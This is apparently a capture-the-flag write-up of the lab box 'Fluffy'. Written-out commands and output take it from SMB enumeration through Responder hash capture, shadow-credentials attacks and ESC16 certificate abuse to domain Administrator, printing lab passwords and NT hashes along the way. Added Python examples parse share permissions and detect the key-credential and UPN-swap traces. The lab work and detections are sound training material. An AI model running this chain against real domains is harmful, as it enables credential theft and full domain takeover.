Fluffy

Quickie

User

We are provided access to the user j.fleischman:J0elTHEM4n1990!.

Using netexec, we can quickly enumerate the SMB shares and see which ones this user can read from or write to.

netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 
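Across many hosts this is easier to review programmatically. The following parser is an added example, not part of the original writeup: it reads netexec's `--shares` text output (copied from the run above) and reports non-default shares that the scanned user can write to. It assumes netexec's row layout (protocol, IP, port, host, share, optional permissions, remark) and share names without spaces.

```python
import re
from dataclasses import dataclass

# Default Windows / DC shares; a WRITE on anything else is the finding to chase.
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$", "NETLOGON", "SYSVOL", "PRINT$"}

# netexec rows: protocol, IP, port, host, then 'share  [perms]  remark' where
# perms is absent, READ, WRITE or READ,WRITE. Assumes share names without spaces.
ROW_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+(?P<share>\S+)\s*"
    r"(?P<perms>(?:READ|WRITE)(?:,(?:READ|WRITE))?)?\s*(?P<remark>.*)$"
)

@dataclass(frozen=True)
class Share:
    host: str
    ip: str
    name: str
    perms: frozenset
    remark: str

def parse_shares(output: str) -> list:
    """Turn netexec --shares text output into Share records."""
    shares = []
    for line in output.splitlines():
        m = ROW_RE.match(line.rstrip())
        # Skip status lines ([*], [+]) and the table header / separator rows.
        if not m or m["share"].startswith(("[", "-")) or m["share"] == "Share":
            continue
        perms = frozenset(m["perms"].split(",")) if m["perms"] else frozenset()
        shares.append(Share(m["host"], m["ip"], m["share"], perms, m["remark"].strip()))
    return shares

def writable_non_default(shares: list) -> list:
    """Non-default shares the scanned user can write to."""
    return [s for s in shares if "WRITE" in s.perms and s.name.upper() not in DEFAULT_SHARES]

# Copied from the netexec run above (share table only).
SAMPLE = """\
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share
"""

if __name__ == "__main__":
    for s in writable_non_default(parse_shares(SAMPLE)):
        print(f"{s.host} ({s.ip}): {s.name} is writable")  # DC01 (10.10.11.69): IT is writable
```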

The IT share stands out: it is the only non-default share, and it is writable. Let's use impacket-smbclient to check it out.

impacket-smbclient j.fleischman@10.10.11.69 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
Type help for list of commands
# ls
[-] No share selected
# use it
# ls
drw-rw-rw-          0  Wed Jun  4 05:55:26 2025 .
drw-rw-rw-          0  Wed Jun  4 05:55:26 2025 ..
drw-rw-rw-          0  Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw-    1827464  Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw-          0  Fri May 16 22:51:49 2025 KeePass-2.58
-rw-rw-rw-    3225346  Fri May 16 22:51:49 2025 KeePass-2.58.zip
-rw-rw-rw-     169963  Sat May 17 22:31:07 2025 Upgrade_Notice.pdf

Upgrade_Notice.pdf points at a particular CVE. Cloning the public PoC for it and running Responder to catch the resulting authentication gives us a callback.

sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.85]
    Responder IPv6             [dead:beef:4::1053]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-I3SM06WIZWL]
    Responder Domain Name      [ZKM3.LOCAL]
    Responder DCE-RPC Port     [45843]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:8db68836481e820b:E7CA67E6FA52D8CE078F9DD8C82BA9DC:01010000000000000004A0DC17D5DB01A234CB70BDB43EAB00000000020008005A004B004D00330001001E00570049004E002D004900330053004D0030003600570049005A0057004C0004003400570049004E002D004900330053004D0030003600570049005A0057004C002E005A004B004D0033002E004C004F00430041004C00030014005A004B004D0033002E004C004F00430041004C00050014005A004B004D0033002E004C004F00430041004C00070008000004A0DC17D5DB0106000400020000000800300030000000000000000100000000200000BCC9F77CEF3A5344C19CD6ACA6DC3E43C26C4CC18FA1518DF4CD129014BDCAAE0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380035000000000000000000

Cracking the captured NTLMv2 hash gives us the credentials p.agila:prometheusx-303.

As always, we use BloodHound to map out possible AD attack paths.

Looks simple enough.

Our GenericAll right over the Service Accounts group grants full control of the object, including its membership, so we can add the newly obtained p.agila to it with net rpc:

net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69
net rpc group members "Service Accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69
FLUFFY\ca_svc
FLUFFY\ldap_svc
FLUFFY\p.agila
FLUFFY\winrm_svc

GenericWrite lets us do either a targeted Kerberoasting attack or a shadow credentials attack (the latter requires ADCS). We opt for shadow credentials, since the presence of ca_svc suggests ADCS is in use.

certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip 10.10.11.69 -account 'winrm_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c'
[*] Adding Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ls
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../
*Evil-WinRM* PS C:\Users\winrm_svc> ls


    Directory: C:\Users\winrm_svc


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/17/2025  11:56 AM                Desktop
d-r---        5/19/2025   9:15 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\winrm_svc> cd Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ls


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/3/2025  10:04 AM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
<REDACTED>

Root

winrm_svc has GenericWrite over the users ldap_svc and ca_svc, which means we can perform the shadow credentials attack again to retrieve their respective NT hashes.

certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ldap_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7'
[*] Adding Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f538f689-fb88-05f3-c323-29489d51470c'
[*] Adding Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
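Each of the shadow credentials runs above (against winrm_svc, ldap_svc and ca_svc) writes a value to the target's msDS-KeyCredentialLink attribute and then restores it, which a domain controller records as Directory Service Changes events (ID 5136). The detection below is an added defender-side example, not part of the writeup; the event records are constructed to mirror those runs, the field names follow the 5136 event XML, and it assumes an object's CN equals its sAMAccountName (true for this box).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# OperationType codes used by event 5136 (Directory Service Changes).
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"

def kcl_alerts(events, allowed_writers=frozenset(), window=timedelta(minutes=10)):
    """Return alert strings for suspicious msDS-KeyCredentialLink changes.

    Two signals: a write by a principal that is neither the object itself nor
    in `allowed_writers` (your environment's known key-enrollment identities),
    and an add followed by a delete on the same object inside `window`, the
    footprint of a tool that restores the attribute once it has a TGT.
    Requires 'Audit Directory Service Changes' plus a SACL on the objects.
    """
    alerts, pending_adds = [], defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["TimeCreated"]):
        if e["EventID"] != 5136 or e["AttributeLDAPDisplayName"] != "msDS-KeyCredentialLink":
            continue
        # Assumes the object's CN equals its sAMAccountName (true for this box).
        target = e["ObjectDN"].split(",")[0].removeprefix("CN=").lower()
        actor = e["SubjectUserName"].rstrip("$").lower()  # WS01$ -> ws01
        if actor != target and actor not in allowed_writers:
            alerts.append(f"{actor} wrote msDS-KeyCredentialLink on {target}")
        if e["OperationType"] == VALUE_ADDED:
            pending_adds[target].append(e["TimeCreated"])
        elif e["OperationType"] == VALUE_DELETED and any(
                e["TimeCreated"] - t <= window for t in pending_adds[target]):
            alerts.append(f"key credential added and removed on {target} within {window}")
    return alerts

def _ev(t, actor, dn, op):  # helper to build a constructed 5136 record
    return {"EventID": 5136, "TimeCreated": t, "SubjectUserName": actor, "ObjectDN": dn,
            "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": op}

T0 = datetime(2025, 6, 4, 10, 0, 0)  # constructed timestamps
USERS = "CN=Users,DC=fluffy,DC=htb"
EVENTS = [  # constructed to mirror the certipy 'shadow ... auto' runs above
    _ev(T0, "p.agila", f"CN=winrm_svc,{USERS}", VALUE_ADDED),
    _ev(T0 + timedelta(seconds=6), "p.agila", f"CN=winrm_svc,{USERS}", VALUE_DELETED),
    _ev(T0 + timedelta(minutes=30), "winrm_svc", f"CN=ca_svc,{USERS}", VALUE_ADDED),
    _ev(T0 + timedelta(minutes=30, seconds=5), "winrm_svc", f"CN=ca_svc,{USERS}", VALUE_DELETED),
    # Benign: a workstation registering a key on its own computer object.
    _ev(T0 + timedelta(hours=2), "WS01$", "CN=WS01,CN=Computers,DC=fluffy,DC=htb", VALUE_ADDED),
]

if __name__ == "__main__":
    for a in kcl_alerts(EVENTS):
        print(a)
```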

ca_svc is a member of the Cert Publishers group, and querying the CA with certipy shows it is vulnerable to ESC16.

Looking at the documentation, we go with scenario A, since the accounts we have already owned fulfil its criteria.

Attacker (winrm_svc@fluffy.htb) has GenericWrite permission over a "victim" account (ca_svc@fluffy.htb). The victim account can enroll in any suitable client authentication template (e.g., the default "User" template) on the ESC16-vulnerable CA. The target for impersonation is administrator@fluffy.htb.

First, we need to set the UPN of our victim account ca_svc to administrator@fluffy.htb.

certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -upn 'administrator@fluffy.htb' -user 'ca_svc' update

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator@fluffy.htb
[*] Successfully updated 'ca_svc'

Next, using the victim account ca_svc (authenticating with its Kerberos ticket via -k), we request a certificate from a client-authentication template such as User; the issued certificate picks up the spoofed UPN.

certipy-ad -debug req -k -dc-host 10.10.11.69 -target DC01.fluffy.htb -ca fluffy-DC01-CA -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[+] Domain retrieved from CCache: FLUFFY.HTB
[+] Username retrieved from CCache: ca_svc
[+] Nameserver: None
[+] DC IP: None
[+] DC Host: '10.10.11.69'
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: 'FLUFFY.HTB'
[+] Username: 'CA_SVC'
[+] Trying to resolve 'DC01.fluffy.htb' at '192.168.125.2'
[!] DNS resolution failed: The DNS query name does not exist: DC01.fluffy.htb.
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/certipy/lib/target.py", line 442, in resolve
    answers = self.resolver.resolve(hostname, tcp=self.use_tcp)
  File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 1306, in resolve
    (request, answer) = resolution.next_request()
                        ~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 750, in next_request
    raise NXDOMAIN(qnames=self.qnames_to_try, responses=self.nxdomain_responses)
dns.resolver.NXDOMAIN: The DNS query name does not exist: DC01.fluffy.htb.
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from ca_svc.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: ca_svc
[+] Getting TGS for 'HOST/DC01.fluffy.htb'
[+] Got TGS for 'HOST/DC01.fluffy.htb'
[+] Trying to connect to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[*] Request ID is 17
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@fluffy.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Lastly, we revert the UPN so that administrator@fluffy.htb again maps to the real Administrator account, then authenticate with the certificate as Administrator.

certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69  -upn 'ca_svc' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc
[*] Successfully updated 'ca_svc'

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.69 -username 'administrator' -domain fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@fluffy.htb'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat *
<REDACTED>
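The ESC16 chain above leaves two durable traces: 4738 events recording the UPN of ca_svc being changed and changed back, and a certificate in the CA database issued to ca_svc whose SAN UPN is administrator@fluffy.htb and which carries no SID extension (the "Certificate has no object SID" line). The correlation below is an added defender-side example, not part of the writeup; the 4738 records and CA rows are constructed to mirror this run, with field names taken from the 4738 event XML and a certutil -view style layout for the issued certificates, and it assumes an up-to-date map of sAMAccountName to UPN.

```python
from datetime import datetime, timedelta

def upn_changes(events_4738):
    """(time, actor, target, new_upn) for each 4738 that changed a UPN."""
    return [(e["TimeCreated"], e["SubjectUserName"], e["TargetUserName"], e["UserPrincipalName"])
            for e in events_4738 if e["UserPrincipalName"] != "-"]  # '-' = attribute unchanged

def esc16_alerts(events_4738, issued, directory, window=timedelta(hours=1)):
    """Flag issued certificates whose SAN UPN is not the requester's own UPN.

    directory maps sAMAccountName -> current UPN. Without the SID security
    extension the KDC maps a certificate by its SAN UPN, so a foreign UPN is an
    impersonation token; a 4738 that set that UPN on the requester shortly
    before issuance confirms the swap even after it has been reverted.
    """
    alerts, swaps = [], upn_changes(events_4738)
    for c in issued:
        requester = c["Requester"].split("\\")[-1].lower()
        san = c["SanUpn"].lower()
        if san == directory.get(requester, "").lower():
            continue  # SAN matches the requester's own UPN: normal enrollment
        msg = f"req {c['RequestID']} ({c['Template']}) by {requester} carries UPN {san}"
        if not c["HasSidExtension"]:
            msg += ", no SID extension"
        staged = [s for s in swaps if s[2].lower() == requester and s[3].lower() == san
                  and timedelta(0) <= c["Issued"] - s[0] <= window]
        if staged:
            msg += f"; UPN set by {staged[0][1]} {c['Issued'] - staged[0][0]} earlier"
        alerts.append(msg)
    return alerts

# Constructed data modelled on the run above: UPN swap, issuance, revert.
T0 = datetime(2025, 6, 4, 12, 0, 0)
DIRECTORY = {"ca_svc": "ca_svc@fluffy.htb", "administrator": "administrator@fluffy.htb",
             "j.fleischman": "j.fleischman@fluffy.htb"}
def _chg(t, actor, target, upn):  # constructed 4738 record
    return {"EventID": 4738, "TimeCreated": t, "SubjectUserName": actor,
            "TargetUserName": target, "UserPrincipalName": upn}
EVENTS_4738 = [
    _chg(T0, "winrm_svc", "ca_svc", "administrator@fluffy.htb"),
    _chg(T0 + timedelta(minutes=5), "winrm_svc", "ca_svc", "ca_svc"),  # revert
]
ISSUED = [  # shaped like CA database rows (certutil -view); constructed
    {"RequestID": 16, "Requester": "FLUFFY\\j.fleischman", "Template": "User",
     "SanUpn": "j.fleischman@fluffy.htb", "HasSidExtension": False, "Issued": T0 - timedelta(days=1)},
    {"RequestID": 17, "Requester": "FLUFFY\\ca_svc", "Template": "User",
     "SanUpn": "administrator@fluffy.htb", "HasSidExtension": False, "Issued": T0 + timedelta(minutes=2)},
]

if __name__ == "__main__":
    print(*esc16_alerts(EVENTS_4738, ISSUED, DIRECTORY), sep="\n")
```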
